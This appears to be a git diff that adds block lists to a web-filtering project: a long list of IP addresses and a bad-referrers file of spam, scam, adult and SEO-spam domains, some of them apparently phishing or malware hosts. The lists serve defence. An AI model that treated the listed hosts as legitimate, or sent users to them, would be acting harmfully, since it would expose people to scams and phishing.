+87.236.176.227
+87.236.176.229
+87.236.176.23
+87.236.176.230
+87.236.176.232
+87.236.176.233
+87.236.176.234
+87.236.176.235
+87.236.176.236
+87.236.176.237
+87.236.176.238
+87.236.176.24
+87.236.176.240
+87.236.176.241
+87.236.176.244
+87.236.176.245
+87.236.176.246
+87.236.176.247
+87.236.176.248
+87.236.176.249
+87.236.176.251
+87.236.176.252
+87.236.176.253
+87.236.176.26
+87.236.176.29
+87.236.176.3
+87.236.176.30
+87.236.176.33
+87.236.176.34
+87.236.176.35
+87.236.176.37
+87.236.176.38
+87.236.176.39
+87.236.176.40
+87.236.176.41
+87.236.176.43
+87.236.176.45
+87.236.176.47
+87.236.176.48
+87.236.176.50
+87.236.176.52
+87.236.176.53
+87.236.176.57
+87.236.176.59
+87.236.176.60
+87.236.176.61
+87.236.176.63
+87.236.176.64
+87.236.176.66
+87.236.176.67
+87.236.176.68
+87.236.176.69
+87.236.176.72
+87.236.176.74
+87.236.176.75
+87.236.176.76
+87.236.176.78
+87.236.176.79
+87.236.176.80
+87.236.176.81
+87.236.176.82
+87.236.176.84
+87.236.176.85
+87.236.176.87
+87.236.176.88
+87.236.176.89
+87.236.176.90
+87.236.176.91
+87.236.176.92
+87.236.176.93
+87.236.176.94
+87.236.176.96
+87.236.176.97
+87.236.176.98
+87.236.176.99
+87.239.223.71
+87.242.74.186
+87.248.1.199
+87.248.226.146
+87.251.102.94
+87.251.67.151
+87.251.67.195
+87.253.68.149
+87.254.186.20
+87.255.193.50
+87.27.171.6
+87.64.71.57
+87.66.19.10
+87.70.31.80
+87.70.38.78
+87.9.41.26
+87.98.173.252
+88.119.46.218
+88.129.112.108
+88.129.112.119
+88.129.112.126
+88.129.112.43
+88.129.112.55
+88.129.112.59
+88.129.112.6
+88.129.112.88
+88.132.162.99
+88.138.114.161
+88.142.156.31
+88.147.120.136
+88.147.188.76
+88.147.30.59
+88.149.153.87
+88.151.32.109
+88.170.64.239
+88.174.202.61
+88.182.251.194
+88.198.170.27
+88.199.50.62
+88.200.136.156
+88.205.172.170
+88.214.25.16
+88.22.154.228
+88.229.58.214
+88.247.132.170
+88.248.134.93
+88.248.2.252
+88.250.31.32
+88.86.209.171
+88.86.223.36
+88.87.88.69
+88.87.92.77
+88.87.94.63
+88.99.91.209
+89.101.238.143
+89.109.1.180
+89.109.128.192
+89.110.114.157
+89.117.18.183
+89.144.209.145
+89.160.118.239
+89.160.6.62
+89.160.94.156
+89.160.94.158
+89.165.1.16
+89.165.1.20
+89.165.1.36
+89.165.193.254
+89.169.53.80
+89.177.208.191
+89.179.33.126
+89.183.192.76
+89.185.85.104
+89.185.85.56
+89.187.162.176
+89.187.162.213
+89.188.76.72
+89.188.76.74
+89.189.148.122
+89.189.159.106
+89.190.156.26
+89.190.156.28
+89.20.96.210
+89.207.218.10
+89.208.103.230
+89.208.104.147
+89.208.97.186
+89.213.174.34
+89.216.47.154
+89.217.53.239
+89.218.165.138
+89.22.149.253
+89.22.151.11
+89.22.229.123
+89.22.233.73
+89.22.234.176
+89.22.235.215
+89.232.73.146
+89.234.157.254
+89.237.78.155
+89.245.48.167
+89.248.163.197
+89.248.163.200
+89.248.163.26
+89.248.165.96
+89.248.167.131
+89.248.168.239
+89.248.172.16
+89.25.181.2
+89.29.175.245
+89.29.183.15
+89.31.187.230
+89.47.200.22
+89.58.26.216
+89.58.30.200
+89.58.41.156
+89.77.160.8
+89.97.218.142
+89.99.162.210
+90.103.225.131
+90.142.41.139
+90.151.171.106
+90.151.171.109
+90.154.125.157
+90.154.140.48
+90.160.139.163
+90.167.13.113
+90.170.254.208
+90.176.67.60
+90.188.13.55
+90.189.120.243
+90.19.190.197
+90.219.70.176
+90.225.68.108
+90.229.216.53
+90.239.30.219
+90.35.237.62
+90.52.57.22
+90.69.185.89
+90.91.184.222
+91.103.110.33
+91.103.252.151
+91.103.253.62
+91.106.95.98
+91.121.2.118
+91.121.58.183
+91.122.226.189
+91.122.59.23
+91.126.83.167
+91.132.118.38
+91.132.144.59
+91.134.248.192
+91.134.248.249
+91.137.235.177
+91.142.220.242
+91.143.58.228
+91.144.150.27
+91.144.150.75
+91.144.154.74
+91.144.158.231
+91.144.162.41
+91.144.18.11
+91.144.20.198
+91.144.21.170
+91.147.93.36
+91.148.190.150
+91.151.128.225
+91.151.178.62
+91.151.88.144
+91.153.66.74
+91.159.141.225
+91.165.234.109
+91.183.228.180
+91.184.248.175
+91.185.50.165
+91.186.193.65
+91.187.123.160
+91.189.165.107
+91.189.183.213
+91.191.209.206
+91.191.209.234
+91.191.239.42
+91.201.215.187
+91.202.230.214
+91.202.233.16
+91.202.233.20
+91.205.210.234
+91.205.219.185
+91.206.26.26
+91.209.235.28
+91.210.59.57
+91.211.191.65
+91.213.99.45
+91.214.72.233
+91.215.110.81
+91.216.236.99
+91.217.109.82
+91.217.76.55
+91.218.102.193
+91.218.64.199
+91.219.196.17
+91.220.204.168
+91.221.76.28
+91.223.169.83
+91.224.17.247
+91.231.233.55
+91.232.120.102
+91.234.125.216
+91.236.168.249
+91.238.181.20
+91.238.181.21
+91.238.181.22
+91.238.181.23
+91.238.181.31
+91.238.181.32
+91.238.181.33
+91.238.181.34
+91.238.181.35
+91.238.181.71
+91.238.69.91
+91.239.19.66
+91.239.207.254
+91.239.79.50
+91.240.118.215
+91.240.61.14
+91.244.113.178
+91.244.115.35
+91.244.210.240
+91.244.73.221
+91.247.151.6
+91.64.155.152
+91.74.98.113
+91.75.14.80
+91.77.163.86
+91.89.206.128
+91.92.120.31
+91.92.130.12
+91.92.199.36
+91.92.69.27
+91.92.84.185
+92.115.16.65
+92.118.112.62
+92.118.39.101
+92.118.39.152
+92.118.39.17
+92.118.39.203
+92.118.39.212
+92.118.39.34
+92.118.39.37
+92.118.39.81
+92.118.39.84
+92.124.117.9
+92.124.144.204
+92.126.239.43
+92.131.162.246
+92.145.42.154
+92.15.149.52
+92.154.18.155
+92.154.95.236
+92.180.12.186
+92.204.144.151
+92.205.108.83
+92.205.231.90
+92.221.101.111
+92.222.108.131
+92.222.171.6
+92.222.181.145
+92.241.98.211
+92.246.139.102
+92.246.139.107
+92.246.84.133
+92.249.48.232
+92.249.48.49
+92.253.102.110
+92.253.120.169
+92.255.165.85
+92.255.182.200
+92.255.194.79
+92.255.195.59
+92.255.196.185
+92.255.196.218
+92.255.229.209
+92.255.242.100
+92.255.248.106
+92.255.57.51
+92.255.57.58
+92.255.57.59
+92.255.57.60
+92.255.85.107
+92.255.85.110
+92.255.85.111
+92.255.85.112
+92.255.85.120
+92.255.85.164
+92.255.85.253
+92.255.85.26
+92.255.85.27
+92.255.85.29
+92.255.85.35
+92.255.85.37
+92.255.85.50
+92.255.85.51
+92.255.85.52
+92.27.101.99
+92.27.157.252
+92.27.247.25
+92.31.0.236
+92.42.96.51
+92.43.189.6
+92.49.159.14
+92.50.124.58
+92.50.182.242
+92.50.183.250
+92.53.74.138
+92.55.190.215
+92.55.83.69
+92.60.39.47
+92.62.243.154
+92.63.197.210
+92.63.206.99
+92.65.107.171
+92.81.46.15
+92.87.22.210
+92.9.32.153
+92.99.157.216
+93.113.63.124
+93.113.63.8
+93.115.79.102
+93.117.197.98
+93.118.117.185
+93.120.240.202
+93.123.109.142
+93.123.194.205
+93.123.39.109
+93.123.39.141
+93.123.39.97
+93.123.85.105
+93.125.83.110
+93.131.11.78
+93.144.109.167
+93.144.110.156
+93.144.144.163
+93.144.53.153
+93.146.113.43
+93.147.111.138
+93.147.116.203
+93.148.140.165
+93.148.149.165
+93.148.169.171
+93.149.141.146
+93.149.142.155
+93.149.215.124
+93.150.73.115
+93.151.211.67
+93.155.249.95
+93.157.248.178
+93.160.174.27
+93.170.144.140
+93.170.38.54
+93.174.93.12
+93.174.95.106
+93.176.2.87
+93.182.160.222
+93.183.175.37
+93.183.185.21
+93.183.214.179
+93.184.151.18
+93.185.73.178
+93.188.83.96
+93.191.14.149
+93.240.123.227
+93.41.182.249
+93.43.213.187
+93.44.153.160
+93.51.132.21
+93.51.29.145
+93.51.37.228
+93.63.6.20
+93.65.105.24
+93.65.142.25
+93.66.167.67
+93.66.33.140
+93.66.33.250
+93.67.93.177
+93.70.115.16
+93.70.8.47
+93.71.135.152
+93.71.192.104
+93.71.20.190
+93.71.206.214
+93.71.60.141
+93.84.100.70
+94.100.99.195
+94.102.49.119
+94.102.49.193
+94.102.51.15
+94.102.51.218
+94.102.56.99
+94.103.125.122
+94.103.125.176
+94.103.125.204
+94.103.125.80
+94.113.240.21
+94.127.212.198
+94.130.27.51
+94.131.106.243
+94.131.211.168
+94.136.189.247
+94.137.64.219
+94.139.165.200
+94.139.207.214
+94.141.120.129
+94.141.120.150
+94.141.120.242
+94.141.120.39
+94.141.120.58
+94.141.120.65
+94.154.33.153
+94.156.104.179
+94.156.104.51
+94.156.104.53
+94.156.104.54
+94.156.104.56
+94.156.104.58
+94.156.104.59
+94.156.166.49
+94.156.167.217
+94.156.167.76
+94.156.167.78
+94.156.167.81
+94.156.167.83
+94.156.177.10
+94.156.177.104
+94.156.177.111
+94.156.177.12
+94.156.177.133
+94.156.177.138
+94.156.177.139
+94.156.177.20
+94.156.177.213
+94.156.177.224
+94.156.177.227
+94.156.177.26
+94.156.177.35
+94.156.177.41
+94.156.177.47
+94.156.177.49
+94.156.177.50
+94.156.177.58
+94.156.177.65
+94.156.177.67
+94.156.177.8
+94.158.154.170
+94.158.178.252
+94.158.246.181
+94.159.104.177
+94.159.113.18
+94.159.93.115
+94.177.106.38
+94.177.159.102
+94.179.107.98
+94.179.109.66
+94.181.151.139
+94.182.108.208
+94.182.176.185
+94.19.104.188
+94.190.222.124
+94.198.106.45
+94.20.233.203
+94.200.80.226
+94.202.50.236
+94.204.45.174
+94.204.97.129
+94.205.80.157
+94.205.83.205
+94.206.197.64
+94.206.198.147
+94.207.112.113
+94.207.26.37
+94.228.163.98
+94.228.169.57
+94.228.169.65
+94.23.123.1
+94.23.207.193
+94.23.219.59
+94.23.68.219
+94.230.119.157
+94.230.141.38
+94.230.208.147
+94.232.247.116
+94.232.247.194
+94.232.40.72
+94.236.200.144
+94.236.200.254
+94.236.239.42
+94.243.196.222
+94.244.56.3
+94.247.135.179
+94.249.88.26
+94.251.4.50
+94.254.0.234
+94.254.100.75
+94.255.198.236
+94.255.203.36
+94.26.228.213
+94.26.230.205
+94.41.0.232
+94.41.17.153
+94.41.208.194
+94.41.65.46
+94.45.56.254
+94.45.76.149
+94.52.209.104
+94.53.116.52
+94.53.155.34
+94.61.7.100
+94.65.124.96
+94.70.152.191
+94.70.195.149
+94.72.115.107
+94.72.117.217
+94.72.52.14
+94.75.224.180
+94.75.225.81
+94.78.7.67
+95.104.194.69
+95.105.113.109
+95.105.89.221
+95.128.43.164
+95.128.69.10
+95.129.113.9
+95.130.227.131
+95.130.227.206
+95.130.227.80
+95.133.36.7
+95.135.175.219
+95.138.243.145
+95.141.134.14
+95.141.228.9
+95.141.230.2
+95.152.60.122
+95.154.64.190
+95.160.28.219
+95.160.47.156
+95.163.84.18
+95.164.33.211
+95.164.69.179
+95.164.89.144
+95.165.152.97
+95.165.153.0
+95.165.29.72
+95.165.65.191
+95.167.133.86
+95.167.225.76
+95.167.53.114
+95.167.70.20
+95.17.36.7
+95.170.88.218
+95.173.161.230
+95.173.191.84
+95.174.104.112
+95.174.99.133
+95.181.135.99
+95.181.160.167
+95.181.161.231
+95.181.86.2
+95.181.94.204
+95.191.217.195
+95.214.27.168
+95.214.27.169
+95.214.27.170
+95.214.27.193
+95.214.27.27
+95.214.27.29
+95.214.27.30
+95.214.27.31
+95.214.27.32
+95.214.27.33
+95.214.27.38
+95.214.27.39
+95.214.27.40
+95.214.27.41
+95.214.53.91
+95.214.55.138
+95.214.55.43
+95.214.55.79
+95.215.210.102
+95.220.25.124
+95.221.37.33
+95.229.100.106
+95.229.118.228
+95.230.178.108
+95.231.227.242
+95.232.51.168
+95.233.217.217
+95.233.37.234
+95.234.172.88
+95.234.202.151
+95.237.42.11
+95.239.69.222
+95.245.2.248
+95.245.67.57
+95.250.114.130
+95.253.200.85
+95.254.148.168
+95.255.108.3
+95.27.217.114
+95.31.15.104
+95.31.6.109
+95.38.132.125
+95.47.119.228
+95.52.220.109
+95.53.130.181
+95.54.227.123
+95.56.227.226
+95.57.104.252
+95.58.255.251
+95.66.153.173
+95.66.159.143
+95.68.246.151
+95.78.114.126
+95.78.118.47
+95.78.121.151
+95.78.121.52
+95.78.163.153
+95.78.247.220
+95.78.37.53
+95.79.101.229
+95.79.108.51
+95.79.119.19
+95.79.223.17
+95.79.46.245
+95.79.50.161
+95.81.93.99
+95.84.148.71
+95.84.150.212
+95.84.154.77
+95.84.158.215
+95.84.192.168
+95.85.112.170
+95.85.114.218
+95.85.47.10
+95.86.209.66
+95.87.225.236
+95.87.248.223
+95.9.245.47
+95.90.242.212
+95.90.93.96
+95.91.237.70
+96.10.144.195
+96.126.120.184
+96.18.193.103
+96.18.32.153
+96.19.196.219
+96.2.25.172
+96.232.248.246
+96.239.60.74
+96.249.234.242
+96.37.119.29
+96.39.16.158
+96.45.16.67
+96.56.184.26
+96.67.159.90
+96.67.59.65
+96.68.36.250
+96.69.13.140
+96.70.176.106
+96.73.137.118
+96.76.89.46
+96.77.117.189
+96.77.209.214
+96.78.129.189
+96.78.175.36
+96.78.175.39
+96.78.175.41
+96.78.175.45
+96.79.174.131
+96.79.249.93
+96.80.236.155
+96.82.219.131
+96.84.234.234
+96.88.153.181
+97.100.112.124
+97.104.82.254
+97.107.129.124
+97.107.140.160
+97.68.103.6
+97.74.83.185
+97.74.87.26
+97.74.87.44
+97.74.95.243
+97.86.134.216
+98.10.121.246
+98.102.58.10
+98.109.152.47
+98.111.139.140
+98.116.240.38
+98.128.142.76
+98.128.173.33
+98.159.236.215
+98.172.65.94
+98.175.187.93
+98.177.3.82
+98.188.163.22
+98.223.168.193
+98.24.163.2
+98.40.228.65
+98.47.116.86
+98.57.97.40
+98.96.193.13
+98.96.193.2
+98.96.193.26
+98.96.193.29
+98.96.193.4
+98.96.193.5
+98.96.193.50
+98.96.193.51
+98.96.193.53
+98.97.66.1
+98.98.57.62
+99.145.84.238
+99.240.113.135
diff --git a/db/bad-referrers.txt b/db/bad-referrers.txt
new file mode 100644
index 00000000..75f087ff
--- /dev/null
+++ b/db/bad-referrers.txt
@@ -0,0 +1,7105 @@
+000free.us
+007angels.com
+00author.com
+00go.com
+00it.com
+00webcams.com
+01apple.com
+03e.info
+03p.info
+08800.top
+0912701309f8ce.com
+0c47f8422d3f.com
+0daymusic.org
+0lovespells0.blogspot.com
+0n-line.tv
+1-99seo.com
+1-free-share-buttons.com
+1000n1.ru
+1001desert.com
+1001watch.com.ua
+1008.su
+100dollars-seo.com
+100searchengines.com
+101billion.com
+101flag.ru
+101lesbian.xyz
+101raccoon.ru
+108shot.com
+10bet.com
+11235813.webzdarma.cz
+11pikachu.ru
+123any.com
+123cha.com
+123kuma.com
+123locker.com
+123movies.love
+12bet.com
+12masterov.com
+12u.info
+1314dh.com
+13tabs.com
+14b.info
+1688.com
+178evakuator178.ru
+18ps.ru
+1adult.com
+1bet.com
+1flag.co.za
+1hwy.com
+1j7740kd.website
+1kdailyprofit.me
+1kinobig.ru
+1millionusd.xyz
+1pamm.ru
+1qingdao.com
+1stat.ru
+1webmaster.ml
+1xbet4you.com
+2000k.ru
+2015god.org
+2020iscoming.info
+202ch.com
+20pascals.nl
+214jaluwobapef.cf
+21h2o.com
+2345.com
+23kw.ru
+24-ak.ru
+24videos.tv
+24x7-server-support.site
+256bit.by
+2728fb936f0.com
+273-fz.ru
+28n2gl3wfyb0.ru
+2ads.co.uk
+2daytrendingnews.com
+2drittel.de
+2girls1cup-free.com
+2itech.ru
+2kata.ru
+2nt.ru
+2pxg8bcf.top
+2rich4bitches.com
+2x2fan.ru
+3-letter-domains.net
+300richmond.co.nz
+34.gs
+3dracergames.com
+3rbseyes.com
+3th.co.in
+3w24.com
+3weekdiet.com
+3xforum.ro
+404.mn
+40cg.com
+45en.ru
+4inn.ru
+4istoshop.com
+4k-player.pl
+4kepics.com
+4kpics.rocks
+4kplayer.pl
+4pp13.com
+4rent.ru
+4replicawatch.net
+4senses.co
+4ur.click
+4ureyesonly.com
+4webmasters.com
+4webmasters.org
+5-steps-to-start-business.com
+5000-cotydzien.com
+51.la
+51unlim.ru
+55wmz.ru
+57883.net
+5elementov.ru
+5forex.ru
+5i2.net
+5kstore.com
+5tey7463.weebly.com
+5u.com
+5ws.dating-app.ru
+6128786.com
+66cpwgln.space
+6hopping.com
+70casino.online
+72-news.com
+76brighton.co.uk
+777-club.ru
+7a2rnuey1tw9ar.ru
+7fon.ru
+7makemoneyonline.com
+7minuteworkout.com
+7ooo.ru
+7search.com
+7wind.ru
+7xc4n.com
+7yue.org
+7zap.com
+83net.jp
+8558l.jobs.net
+883zy.com
+888.com
+8gold.com
+8jn.dating-app.ru
+8kisses.eu
+8lufu.com
+8si.ru
+8xv8.com
+91abcw.com
+98oi.ru
+991mostfm.co.id
+999webdesign.com
+9icmzvn6.website
+9med.net
+DomainStatsBot
+a.frcls.fr
+a.pr-cy.ru
+a14download.com
+a1security.com.ua
+a96527gi.beget.tech
+aa08daf7e13b6345e09e92f771507fa5f4.com
+aa14ab57a3339c4064bd9ae6fad7495b5f.com
+aa625d84f1587749c1ab011d6f269f7d64.com
+aa81bf391151884adfa3dd677e41f94be1.com
+aa8780bb28a1de4eb5bff33c28a218a930.com
+aa8b68101d388c446389283820863176e7.com
+aa9bd78f328a6a41279d0fad0a88df1901.com
+aa9d046aab36af4ff182f097f840430d51.com
+aaa38852e886ac4af1a3cff9b47cab6272.com
+aab94f698f36684c5a852a2ef272e031bb.com
+aac500b7a15b2646968f6bd8c6305869d7.com
+aac52006ec82a24e08b665f4db2b5013f7.com
+aad1f4acb0a373420d9b0c4202d38d94fa.com
+aadroid.net
+aanapa.ru
+aarbur.com
+aaronabel.com
+aasoldes.fr
+abbanreddy.com
+abcdefh.xyz
+abcdeg.xyz
+abcguru.xyz
+abclauncher.com
+abctoppictures.net
+abiente.ru
+above.com
+abovetherivernc.com
+absolute-s.ru
+absolutelyanalog.com
+absugars.com
+abtasty.com
+abusora.com
+abwa.tk
+academia-nsk.org
+academiacsmendoza.org
+acads.net
+acc.eu.org
+accessoires-mode.in
+acgs.tk
+acheterviagrafr24.com
+acmebtn.ml
+acortarurl.es
+actices.com
+actionnooz.com
+activecampaign.dreamhosters.com
+activepr.ru
+actulite.com
+acunetix-referrer.com
+ad-words.ru
+adamoads.com
+adanih.com
+adbetclickin.pink
+adcash.com
+adclickservice.com
+adclickthru.net
+adconscious.com
+add-add.men
+addbin.men
+addblueoff.com.ua
+addray.pro
+addtoadd.men
+adelly.bg
+adexprts.com
+adf.ly
+adhome.biz
+adidas.frwebs.fr
+adimmix.com
+adinterax.com
+adktrailmap.com
+adloads.com
+adloads.net
+adman.gr
+adman.se
+admanaerofoil.com
+admatic.com.tr
+admeasures.com
+adminshop.com
+admitad.com
+adnotbad.com
+adobereader-free.ru
+adpremium.org
+adprotect.net
+adrenalin-stk.ru
+adrunnr.com
+ads-cool.pro
+ads-seo.men
+ads.gold
+ads.tremorhub.com
+adserver-e7.com
+adservme.com
+adsfresh.men
+adsland.men
+adsloads.com
+adsref.men
+adssafeprotected.com
+adtech.de
+adtech.fr
+adtech.us
+adtiger.tk
+adtology.com
+adult-shop.com.ua
+adult3dgames.com
+adultactioncam.com
+adultfriendfinder.com
+adultfullhd.com
+adultgalls.com
+adultmeetonline.info
+adultnet.in
+adultwebhosting.info
+advancedcleaner.com
+advancedmassagebysara.com
+advancedsoftwaresupport.com
+adventureparkcostarica.com
+adverster.com
+advertex.info
+advertisingtag.net
+adviceforum.info
+advocatemsk.ru
+advokat-grodno.by
+advokateg.ru
+advokateg.xyz
+adzerg.com
+adzpower.com
+aero2.ru
+aerogo.com
+affiliate-fr.com
+affordablewebsitesandmobileapps.com
+affrh2015.com
+afftrack001.com
+afmuseum.com
+afora.ru
+afslankpillen2017nl.eu
+agadelha.com.br
+agahinameh.com
+agapovdg.ru
+agardomains.com
+agecheckadult.com
+ageofclones.com
+aghanyna.com
+agreda.pluto.ro
+agroeconom.kz
+agysya.ru
+ahhjf.com
+ahmedabadwebs.com
+ahrefs.com
+ahrntal.verymes.xyz
+aibolita.com
+aihelen.net
+aimayangzhi.com
+air-edem.ru
+airlandsea.info
+airmaxshoes-2016.com
+akama.com
+akita.kz
+aksonural.ru
+aktivator-windows10.blogspot.com
+aktobe.xkaz.org
+akuhni.by
+akusherok.ru
+akvamaster.dp.ua
+alarmobninsk.ru
+albamargroup.com
+alborzan.com
+albumsuper.info
+albuteroli.com
+ald2014.org
+alekseevec.ru
+alert-fdm.xyz
+alert-fjg.xyz
+alert-hgd.xyz
+alert-jdh.xyz
+alert.scansafe.net
+alessandraleone.com
+alevinefesleri.com
+alf-img.com
+alfa-img.com
+alfa-medosmotr.ru
+alfa9.com
+alfabot.xyz
+alfapro.ru
+algarveglobal.com
+algerianembassy.co.in
+alibestsale.com
+alice.it
+alienwheel.es
+alienwheels.de
+aliexpresscashback.club
+alif-ba-ta.com
+alive-ua.com
+alkoravto.ru
+all-number.com
+all-streaming-media.com
+all4invest.info
+all4invest.ru
+all4wap.ru
+allbizne.co.ua
+allblogroll.com
+allboard.xobor.de
+allcredits.su
+alldezservice.kz
+alldownload.pw
+alldubai.biz
+allesohnegirls.net
+allfinweb.com
+allforminecraft.ru
+allknow.info
+allkrim.com
+allmarketsnewdayli.gdn
+allnews.md
+allnews24.in
+allornamenti.com
+alloysteel.ru
+allpdfmags.net
+allproblog.com
+allsilver925.co.il
+allstatesugarbowl.org
+alltheviews.com
+allwidewallpapers.com
+allwomen.info
+aloofly.com
+alot.com
+alphacarolinas.com
+alphaforum.ru
+alphahoverboards.com
+alpharma.net
+alphavisions.net
+alpinism.ru
+alt-servis.ru
+alta-realestate.com
+altamayoztourism.com
+aludecor.info
+alveris.ru
+alvtank.se
+alyeskaresort.com
+am-se.com
+am15.net
+amanda-porn.ga
+amateurgalls.com
+amateurlivechat.org
+amateurmatch.com
+amazingninja.com
+amazingpic.net
+amazon-adsystem.com
+amazon-seo-service.com
+ameblo.jp
+ameblo.top
+amehdaily.com
+amigobulls.com
+amoi.tn
+amospalla.es
+ample-awards-today.us
+ampower.me
+amt-k.ru
+amung.us
+amyfoxfitness.com
+an-donut.com
+anabolics.shop
+anaksma.info
+anal-acrobats.com
+anal-acrobats.hol.es
+analnoeporno.tv
+analytics-ads.xyz
+ananumous.ru
+anapa-inns.ru
+anaseracresar.tk
+anatomiy.com
+andpolice.com
+android-style.com
+android-systems.ru
+android-vsem.org
+android4fun.org
+androids-store.com
+angel1777.kz
+angigreene.com
+angkortours.vn
+angry-fermi-7633.arukascloud.io
+animal-drawings.com
+animal36.com
+animali.deagostinipassion.it
+animalia-life.club
+animalrank.com
+animaltoplist.com
+anime.dougasouko.com
+animebox.com.ua
+animenime.ru
+anjalika.co.in
+anlimebel.kiev.ua
+anmysite.com
+anniemation.com
+anonymizeme.pro
+anonymous-redirect.com
+anonymousfox.co
+anti-virus-removal.info
+anticrawler.org
+antons-transporte.de
+aosexkontakte.net
+aosheng-tech.com
+ap.senai.br
+apartamentwroclaw.eu
+apartment.ru
+apartmentbay.ru
+apartmentratings.com
+apccargo.com
+apelsinnik.website
+apessay.com
+api.stathat.com
+apiadanaknet-a.akamaihd.net
+apiallgeniusinfo-a.akamaihd.net
+apiappenableinfo-a.akamaihd.net
+apibatbrowsecom-a.akamaihd.net
+apibetweenlinesn-a.akamaihd.net
+apibrowsesmartne-a.akamaihd.net
+apidiamondatanet-a.akamaihd.net
+apidigidocketnet-a.akamaihd.net
+apifasterlightin-a.akamaihd.net
+apiholdingmypage-a.akamaihd.net
+apiitsthirteende-a.akamaihd.net
+apilinkswiftco-a.akamaihd.net
+apiluckyleapnet-a.akamaihd.net
+apimegabrowsebiz-a.akamaihd.net
+apimossnetinfo-a.akamaihd.net
+apimountainbikei-a.akamaihd.net
+apioasisspacenet-a.akamaihd.net
+apioutoboxnet-a.akamaihd.net
+apiportalmorecom-a.akamaihd.net
+apiqualitinknet-a.akamaihd.net
+apisecretsaucebi-a.akamaihd.net
+apishops.ru
+apispringsmartne-a.akamaihd.net
+apiwebwebgetcom-a.akamaihd.net
+apiwoodensealcom-a.akamaihd.net
+app-ready.xyz
+app5.letmacworkfaster.world
+apparel-offer.com
+appartement-stumm.at
+appearance-cool.com
+apper.de
+appfastplay.com
+appfixing.space
+appiq.mobi
+apple.com-cleaner.systems
+apple.com-webbrowsing-security.review
+apple.com-webbrowsing-security.science
+appleid-verification.com
+applicationg29.com
+applyneedy.xyz
+appmsr.org
+approved.su
+approvedlocal.co.za
+apps-analytics.net
+appsaurus.com
+appsecurityr.com
+apptester.tk
+aproposde.com
+apxeo.info
+aquarium-pro.ru
+arabgirls.adultgalls.com
+arabsexxxtube.com
+arabseyes.com
+aramaicmedia.org
+arate.ru
+arcadepages.com
+arcadeplayhouse.com
+architecturebest.com
+arclk.net
+arcteryxsale.online
+arcteryxstore.online
+ardimobileinfo.ml
+arenanews.com.ua
+arenda-avtoprokat-krasnodar.ru
+arenda-yeisk.ru
+arendakvartir.kz
+arendas.net
+arendatora.ru
+arendovalka.xyz
+arewater.com
+arius.tech
+arkartex.ru
+arkkivoltti.net
+arpelsreplica.xyz
+arquapetrarca.info
+arquivo.pt
+arraty.altervista.org
+artavenuegardenstudios.com
+artdeko.info
+artdestshop.eu
+artefakct.com
+artel116.ru
+articlesdirectoryme.info
+artparquet.ru
+artpicso.com
+aruplighting.com
+arvut.org
+as5000.com
+asacopaco.tk
+ascat.porn
+asdfg.pro
+asdfz.pro
+asia-forum.ru
+asiavirtualsolutions.com
+asiengirls.net
+asmxsatadriverin.aircus.com
+asociatia-tipografilor-transilvania.ro
+asophoto.com
+asrv-a.akamaihd.net
+asrv-a.akamoihd.net
+asrvrep-a.akamaihd.net
+asrvvv-a.akamaihd.net
+asscenihotosidea.blogspot.co.za
+asscenihotosidea.blogspot.com
+asseenontv.ru
+asseenontvonline.ru
+astana.xxxkaz.org
+astrochicks.com
+atdedinotuho.tk
+atelielembrancaqueencanta.com.br
+atlant-auto.info
+atlasvkusov.ru
+atleticpharm.org
+atley.eu.pn
+atmagroup.ru
+atmovs.com
+atofilms.com
+atout-energie-69.com
+atovh.local-finders.com
+aucoinhomes.com
+audiobangout.com
+audiofree.ru
+ausergrubhof.info
+ausmepa.org.au
+auspolice.com
+aussie-prizes.com
+australia-opening-times.com
+auto-moto-elektronika.cz
+auto-zapchasti.org
+auto.rusvile.lt
+auto4style.ru
+autoblogger24.info
+autobrennero.it
+autobudpostach.club
+autochoixspinelli.com
+autodo.info
+autogrep.ru
+autoloans.com
+autolombard-krasnodar.ru
+automatic-seo.com
+automobile-spec.com
+autonew.biz
+autoplate.info
+autorn.ru
+autoseo-traffic.com
+autotop.com.ua
+autotrends.today
+autoua.top
+autovideobroadcast.com
+autowebmarket.com.ua
+availit.weebly.com
+avek.ru
+aversis.net
+aviapanda.ru
+aviav.co
+aviav.eu
+aviav.org
+aviav.ru
+aviav.ru.com
+avirasecureserver.com
+avitocars.ru
+aviva-limoux.com
+avkzarabotok.com
+avkzarabotok.info
+avon-novosib.ru
+avon-severozapad.ru
+avon-ukraine.com
+avramstroy.ru
+avto-oligarh.ru
+avtoarenda.by
+avtochehli.by
+avtocredit-legko.ru
+avtointeres.ru
+avtolombard-krasnodar.com
+avtolombard-krasnodar.ru
+avtovolop.ru
+awaybird.ru
+awency.com
+axbocz.net
+ayakino.net
+ayanaspa.com
+ayeartoforget.com
+ayerbo.xhost.ro
+ayodhya.co
+azadnegar.com
+azartclub.org
+azartmix.com
+azartmsl.com
+azartniy-bonus.com
+azarttoto.com
+azazaporn.com
+azazu.ru
+azbaseimages.net
+azbuka-mo.ru
+azbukadiets.ru
+azbukafree.com
+azinoofficial777.ru
+azlex.uz
+azte.ch
+b-styles.xyz
+b00kmarks.com
+b2b-lounge.com
+babespcs.com
+babieca.com
+bablonow.ru
+babosas.com
+babs.com.ua
+babyfactory.fr
+babyguns.ru
+back.dog
+backgroundpictures.net
+backiee.com
+backlink4u.net
+backlinkwatch.com
+backuperwebcam.weebly.com
+bad-stars.net
+badavit.com.ua
+baditri.com
+baersaratov.ru
+bag77.ru
+bagcionderlab.com
+bagsonsale.online
+baikaleminer.com
+baixar-musicas-gratis.com
+baksman.com
+bala.getenjoyment.net
+baladur.ru
+balans.shahterworld.org
+balitouroffice.com
+balkanfarma.org
+balkanfarma.ru
+balla-boo.se
+balois.worldbreak.com
+balook.com
+baltgem.com
+bambi.ck.ua
+bamo.xsl.pt
+banan.tv
+bang-hotties.com
+bangla-chat-uk-paralud.ga
+bank.uz
+bankcrediti.ru
+banki76.ru
+bankiem.pl
+bankmib.ru
+bankofthewext.com
+banksrf.ru
+bannerads.de
+bannerbank.ru
+bannerconnect.net
+bannerpower.com
+bannerspace.com
+bannerswap.com
+bannertesting.com
+baoxaydung.com.vn
+barbourjackets.online
+bard-real.com.ua
+barnfurnituremart.com
+basedecor.ru
+bashtime.ru
+basisches-wasser.net
+batanga.net
+battle.net
+battlecarnival.su
+battleforupdating.site
+bausparen.bz.it
+bavsac.com
+bayareaaeroclub.org
+bazaronline24.ru
+bbsoldes.fr
+bbtec.net
+bcmp.org
+bdsmgalls.net
+beachdriveblog.com
+beachfix.co
+beachpics.com
+beachtoday.ru
+bear.gotcher.us
+beatifullandscape.co
+beauby.ru
+beauty-b0x.pl
+beauty-bracelet.com
+beauty-clinic.ru
+beauty-things.com
+beclean-nn.ru
